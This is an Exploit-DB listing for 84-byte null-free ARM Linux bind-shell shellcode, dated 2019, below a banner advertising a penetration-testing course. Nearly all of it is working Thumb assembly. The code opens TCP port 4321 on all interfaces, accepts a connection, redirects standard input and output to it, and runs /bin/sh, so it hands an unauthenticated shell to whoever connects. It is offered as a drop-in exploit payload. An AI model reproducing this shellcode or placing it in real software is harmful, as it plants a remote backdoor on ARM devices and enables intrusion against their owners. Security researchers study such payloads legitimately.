Linux/ARM - Bind TCP (0.0.0.0:4321) Shell (/bin/sh) + Null-Free Shellcode (84 bytes)

EDB-ID:

46264

CVE:

N/A




Platform:

ARM

Date:

2019-01-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

/*
* Title:  Linux/ARM - Bind_Shell Shellcode TCP (/bin/sh). Null free shellcode 0.0.0.0:4321 (84 bytes)
*Author: Gokul Babu-https://www.linkedin.com/in/gokul-babu-452b3b112/
* Tested: armv7l (Raspberry Pi b3+)
* Date:   2019-01-28
*/

/*socket-281, domain=2,type=1,protocol=0*/
/*bind-282 sockfd=final result of socket,&addr=struct,adrlen=16*/
/*listen-284,sockfd=id value-r4,backlog=1/2*/
/*accept-285,sockfd=id,&addr=0,addrlen=0*/
/*dup2-63,sockfd=final result of accept r4<-r0=4,newfd=0,1,2*/
/*execve-11,execv="/bin/sh",0,0*/

.section .text
.global _start
_start:
.ARM
	add r3,pc,#1
	bx r3
.THUMB
//socket:
	mov r0,#2
	mov r1,#1
	mov r7,#200
	add r7,#81
	svc #1
	mov r4,r0
	push {r0,r1,r2} /*r0=3,r1=1,r2=0*/
//bind:
	adr r1,struct
	strb r2,[r1,#1]
	str r2,[r1,#4] /*store r2=0 in IP*/
	mov r2,#16
	add r7,#1
	svc #1
//listen:
	pop {r0,r1,r2} /*r0=3,r1=1,r2=0*/
	add r7,#2
	svc #1
//accept:
	mov r0,r4
	sub r1,r1 
	add r7,#1
	svc #1
	add r0,r0,r2 /*r0=4,r2=0*/
//dup2:
//dup(4,2)
	mov r7,#63
//dup(4,1)
	mov r1,#1
	svc #1
//dup(4,0)
	sub r1,#1
	svc #1
//execve:
	adr r0,exc
	strb r2,[r0,#7]
	mov r7,#11
	svc #1
exc:
        .ascii "/bin/shX"
struct:
	.ascii "\x02\xff"
	.ascii "\x10\xE1" //port 4321
	.byte  1,1,1,1 //IP-0.0.0.0